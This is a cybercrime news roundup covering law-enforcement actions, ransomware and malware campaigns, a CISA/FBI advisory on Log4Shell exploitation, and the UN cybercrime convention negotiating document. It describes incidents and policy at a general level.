In an internationally coordinated action led by the UK and supported by Europol and Eurojust, 142 suspects have been arrested for allegedly running a website that offered spoofing services. These services allowed cybercriminals to impersonate trusted corporations such as banks, retail companies, and government institutions and then access sensitive information. Evidence shows that the estimated worldwide loss has been more than EUR 115 million. National authorities from the EU, Australia, and Canada supported the investigation. At the same time, Europol’s European Cybercrime Centre (EC3) provided a secure platform and was thus able to identify additional users of spoofing services.
Cybercrime
Killnet hits EU Parliament website with DDoS attack
The European Parliament website has been taken down by a DDoS attack claimed by Anonymous Russia, a member of the pro-Russian hacktivist group Killnet.
The President of the European Parliament confirmed the event, saying that the Parliament’s ‘IT experts are pushing back against it and protecting our systems’.
The attack occurred after the European Parliament designated Russia a state sponsor of terrorism and members advocated that Russia be more isolated internationally.
Study conducted in Australia shows strong links between data breaches and cybercrime victimisation
An extensive survey conducted in Australia in 2021 revealed that one in ten respondents had been notified of a data breach within the previous twelve months, with roughly 28% of those respondents reporting that they had been a victim of identity theft. Data breaches were mainly due to data custodians being targeted by malicious actors, or to information held by these custodians being released due to human error. Significant relationships were also discovered between data breaches and online scams and fraud, and ransomware.
Singapore-based Group-IB identified 34 Russian cybercrime groups
The Singapore-based research team, Group-IB, has identified 34 Russian cybercrime groups responsible for distributing info-stealing malware under the stealer-as-a-service model. The cybercriminals use this type of malware to target users of Steam, Roblox, and Amazon in 111 countries, obtaining user credentials stored in browsers, bank card details, and crypto wallet information from infected computers and selling them on the dark web. Group-IB estimates that more than 890,000 devices in 111 countries in the first seven months of 2022 have been infected. The five most attacked countries are the USA, Brazil, India, Germany, and Indonesia, while the estimated value of stolen credentials is around $5.8 million.
Australian Children’s charity falls victim to cyberattack
Australian children’s charity The Smith Family suffered a cyberattack, with hackers stealing confidential information about donors including their credit card details. While no evidence points to misuse of donor information as yet, similar breaches in recent times have proven early indications to be unreliable. Supporters have been told not to click on unknown links and to check with the Australian Cyber Security Centre (ACSC) for further advice. The incident has been reported to both the ACSC and the Office of the Australian Information Commissioner.
Australia to consolidate approach to cyber defence in light of a wave of ransomware attacks
According to Clare O’Neil, Australian Home Affairs Minister, the country will adopt a more muscular approach to cyber defence in response to a wave of ransomware attacks against Australian firms. Measures will include ‘hacking the hackers’ as part of the country’s offensive cyber capability (OCC), and the general use of strategic ambiguity to strike at cybercriminals while crafting responses to attacks on government and business, especially those demanding a ransom. The government is reportedly considering outlawing the payment of ransoms to disrupt the cybercriminals’ business model.
CISA and FBI issue joint advisory on Iranian government-sponsored APT actors compromising federal network
In the USA, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigations (FBI) have issued a cybersecurity advisory regarding an incident at a Federal Civilian Executive Branch (FCEB). Having assessed that the FCEB network was compromised by Iranian government-sponsored advanced persistent threat (APT) actors, the two entities provided details on the actors’ tactics, techniques, and procedures. One of the findings was that the cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server. As such, organisations with affected VMware systems that did not immediately apply available patches or workarounds were advised toto assume compromise and initiate threat-hunting activities.
DTrack activity detected in countries in Europe and Latin America
Kaspersky, a cybersecurity company, has detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the USA. The Lazarus group uses DTrack as a backdoor against a wide range of targets, allowing attackers to upload, download, launch, or delete files on the victim host. Education, chemical manufacturing, government research centres and policy institutes, IT service providers, power providers, and telecommunications are among the targeted industries.
New Somnia ransomware attacks target corporations in Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) reported the spread of a new ransomware strain called ‘Somnia’, attributing the attacks to the Russian threat actor known as ‘From Russia with Love’ (FRwL), also known as ‘Z-Team’. The ransomware attacks targeted Ukrainian corporations’ employees, using their Telegram accounts to try and gain access to a corporate network.
As explained by CERT-UA, the group used fake sites that mimic the ‘Advanced IP Scanner’ software, which, if downloaded, infects the victim’s computer with the Vidar data-stealing malware that can capture Telegram session data, as well as take over the victim’s account.
Then, the threat actors used victims’ Telegram accounts to gain access to the corporate network. Once access to the target’s network was obtained, the hackers executed reconnaissance operations using tools like Netscan and deployed Cobalt Strike Beacons before exfiltrating data.
According to CERT-UA, the group had previously revealed that they created Somnia ransomware on Telegram and posted evidence of the attacks they made against Ukrainian targets.
Cybercrime Ad Hoc Committee Consolidated Negotiating Document
In preparation for the fourth session, the Committee Chair, with the support of the Secretariat, has prepared a ‘Consolidated negotiating document on the general provisions and the provisions on criminalization and on procedural measures and law enforcement of a comprehensive international convention on countering the use of information and communications technologies for criminal purposes.’ Essentially, the document is a compilation of the states’ proposals during the second session regarding the general provisions, criminalisation, procedural measures, and law enforcement of the draft convention. Regarding the general provisions, the document emphasizes the protection of sovereignty, while most states agreed that the ‘use of terms’ shall be addressed after defining the substantive articles.
Criminalisation provisions cover offences such as illegal access, misuse of devices, and computer-related forgery, among others, while also including offences related to online child sexual abuse. Additionally, the document expands the criminalisation of offences, including but not limited to the incitement of armed activities, terrorism-related offences, and illegal distribution of medicines.
Provisions on procedural measures and law enforcement establish the jurisdiction over the offences that occurred in the territory of a state party, committed by or against a national of the state party, or committed against the state party. The article on jurisdiction ‘does not exclude the exercise of any criminal jurisdiction established by a State Party in accordance with its domestic law.’ Attention was also given to the search and seizure of electronic data, in which states are obliged to adopt measures that empower the competent authorities to search or seize computer data and digital information ‘where there is reasonable belief that a criminal offence was committed or is being committed… in the territory or under the jurisdiction of that State Party.’
Lastly, the consolidated document established that the implementation of the powers and procedures should be in line with international human rights law provisions, while highlighting the need to ensure witness protection.